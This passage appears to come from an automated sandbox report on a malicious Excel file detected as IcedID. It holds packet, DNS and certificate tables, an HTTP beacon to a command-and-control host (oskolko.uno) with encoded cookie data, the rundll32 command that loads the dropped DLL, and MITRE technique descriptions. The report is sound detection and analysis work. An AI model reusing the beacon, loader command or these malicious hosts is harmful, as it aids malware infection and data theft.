Feb 22, 2021 20:13:36.364631891 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.364753962 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.364773989 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.364784956 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.364794016 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.364804983 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.364809036 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.364813089 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.364882946 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.364892960 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.364917994 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.364932060 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.364953041 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.364968061 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.364973068 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.364984035 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.364989996 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.364998102 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.365027905 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.365154982 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.365180016 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.365197897 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.365237951 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.365241051 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.365259886 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.365277052 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.365367889 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.365456104 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.365473032 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.365497112 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.365510941 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.365539074 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.365557909 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.365581989 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.365592957 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.370366096 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.593420029 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.593457937 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.593480110 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.593497038 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.593513966 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.593537092 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.593556881 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.593580008 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.593596935 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.593621016 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.593641043 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.593643904 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.593691111 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.593710899 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.593748093 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.593978882 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.594153881 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.594181061 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.594202995 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.594224930 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.594244003 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.594250917 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.594275951 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.594284058 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.594297886 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.594374895 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.594379902 CET	49165	443	192.168.2.22	197.242.147.47
Feb 22, 2021 20:13:36.594383955 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.594408989 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.594429970 CET	443	49165	197.242.147.47	192.168.2.22
Feb 22, 2021 20:13:36.594450951 CET	443	49165	197.242.147.47	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 22, 2021 20:13:33.474606991 CET	52197	53	192.168.2.22	8.8.8.8
Feb 22, 2021 20:13:33.536704063 CET	53	52197	8.8.8.8	192.168.2.22
Feb 22, 2021 20:13:34.741903067 CET	53099	53	192.168.2.22	8.8.8.8
Feb 22, 2021 20:13:34.803469896 CET	53	53099	8.8.8.8	192.168.2.22
Feb 22, 2021 20:13:34.819705009 CET	52838	53	192.168.2.22	8.8.8.8
Feb 22, 2021 20:13:34.876843929 CET	53	52838	8.8.8.8	192.168.2.22
Feb 22, 2021 20:13:39.638015985 CET	61200	53	192.168.2.22	8.8.8.8
Feb 22, 2021 20:13:39.706338882 CET	53	61200	8.8.8.8	192.168.2.22
Feb 22, 2021 20:13:39.727099895 CET	49548	53	192.168.2.22	8.8.8.8
Feb 22, 2021 20:13:39.794991970 CET	53	49548	8.8.8.8	192.168.2.22
Feb 22, 2021 20:13:41.044770002 CET	55627	53	192.168.2.22	8.8.8.8
Feb 22, 2021 20:13:41.104662895 CET	53	55627	8.8.8.8	192.168.2.22
Feb 22, 2021 20:13:41.113447905 CET	56009	53	192.168.2.22	8.8.8.8
Feb 22, 2021 20:13:41.180327892 CET	53	56009	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 22, 2021 20:13:33.474606991 CET	192.168.2.22	8.8.8.8	0xbf29	Standard query (0)	miraclecollagen.co.za	A (IP address)	IN (0x0001)
Feb 22, 2021 20:13:39.638015985 CET	192.168.2.22	8.8.8.8	0x2d4b	Standard query (0)	aws.amazon.com	A (IP address)	IN (0x0001)
Feb 22, 2021 20:13:39.727099895 CET	192.168.2.22	8.8.8.8	0xbcac	Standard query (0)	aws.amazon.com	A (IP address)	IN (0x0001)
Feb 22, 2021 20:13:41.044770002 CET	192.168.2.22	8.8.8.8	0xa3a3	Standard query (0)	oskolko.uno	A (IP address)	IN (0x0001)
Feb 22, 2021 20:13:41.113447905 CET	192.168.2.22	8.8.8.8	0x4023	Standard query (0)	oskolko.uno	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 22, 2021 20:13:33.536704063 CET	8.8.8.8	192.168.2.22	0xbf29	No error (0)	miraclecollagen.co.za		197.242.147.47	A (IP address)	IN (0x0001)
Feb 22, 2021 20:13:39.706338882 CET	8.8.8.8	192.168.2.22	0x2d4b	No error (0)	aws.amazon.com	tp.8e49140c2-frontier.amazon.com		CNAME (Canonical name)	IN (0x0001)
Feb 22, 2021 20:13:39.706338882 CET	8.8.8.8	192.168.2.22	0x2d4b	No error (0)	tp.8e49140c2-frontier.amazon.com	dr49lng3n1n2s.cloudfront.net		CNAME (Canonical name)	IN (0x0001)
Feb 22, 2021 20:13:39.706338882 CET	8.8.8.8	192.168.2.22	0x2d4b	No error (0)	dr49lng3n1n2s.cloudfront.net		143.204.4.74	A (IP address)	IN (0x0001)
Feb 22, 2021 20:13:39.794991970 CET	8.8.8.8	192.168.2.22	0xbcac	No error (0)	aws.amazon.com	tp.8e49140c2-frontier.amazon.com		CNAME (Canonical name)	IN (0x0001)
Feb 22, 2021 20:13:39.794991970 CET	8.8.8.8	192.168.2.22	0xbcac	No error (0)	tp.8e49140c2-frontier.amazon.com	dr49lng3n1n2s.cloudfront.net		CNAME (Canonical name)	IN (0x0001)
Feb 22, 2021 20:13:39.794991970 CET	8.8.8.8	192.168.2.22	0xbcac	No error (0)	dr49lng3n1n2s.cloudfront.net		143.204.4.74	A (IP address)	IN (0x0001)
Feb 22, 2021 20:13:41.104662895 CET	8.8.8.8	192.168.2.22	0xa3a3	No error (0)	oskolko.uno		206.189.10.247	A (IP address)	IN (0x0001)
Feb 22, 2021 20:13:41.180327892 CET	8.8.8.8	192.168.2.22	0x4023	No error (0)	oskolko.uno		206.189.10.247	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

oskolko.uno

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49168	206.189.10.247	80	C:\Windows\System32\rundll32.exe

Timestamp	kBytes transferred	Direction	Data
Feb 22, 2021 20:13:41.232150078 CET	3649	OUT	GET / HTTP/1.1 Connection: Keep-Alive Cookie: __gads=620514333:1:5267:49; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=373833383735:416C627573; __io=0; _gid=67AFEDC5AC03 Host: oskolko.uno
Feb 22, 2021 20:13:41.546632051 CET	3650	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 22 Feb 2021 19:13:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 30 39 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 6f 73 6b 6f 6c 6b 6f 2e 75 6e 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 109<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at oskolko.uno Port 80</address></body></html>0
Feb 22, 2021 20:13:41.797498941 CET	3650	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 22 Feb 2021 19:13:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 30 39 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 6f 73 6b 6f 6c 6b 6f 2e 75 6e 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 109<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at oskolko.uno Port 80</address></body></html>0

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Feb 22, 2021 20:13:34.028166056 CET	197.242.147.47	443	192.168.2.22	49165	CN=miraclecollagen.co.za CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Sat Jan 02 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004	Sat Apr 03 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
					CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Mon May 18 02:00:00 CEST 2015	Sun May 18 01:59:59 CEST 2025
					CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Jan 01 01:00:00 CET 2004	Mon Jan 01 00:59:59 CET 2029
Feb 22, 2021 20:13:39.895698071 CET	143.204.4.74	443	192.168.2.22	49167	CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US	Wed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009	Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
					CN=Amazon, OU=Server CA 1B, O=Amazon, C=US	CN=Amazon Root CA 1, O=Amazon, C=US	Thu Oct 22 02:00:00 CEST 2015	Sun Oct 19 02:00:00 CEST 2025
					CN=Amazon Root CA 1, O=Amazon, C=US	CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	Mon May 25 14:00:00 CEST 2015	Thu Dec 31 02:00:00 CET 2037
					CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US	Wed Sep 02 02:00:00 CEST 2009	Wed Jun 28 19:39:16 CEST 2034

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2332 Parent PID: 584

General

Start time:	20:13:46
Start date:	22/02/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fd60000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: rundll32.exe PID: 2324 Parent PID: 2332

General

Start time:	20:13:56
Start date:	22/02/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 ..\idefje.ekfd,DllRegisterServer
Imagebase:	0xff420000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.2128403008.000000000037F000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report document-1915351743.xls

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "document-1915351743.xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 80004

General

Macro 4.0 Code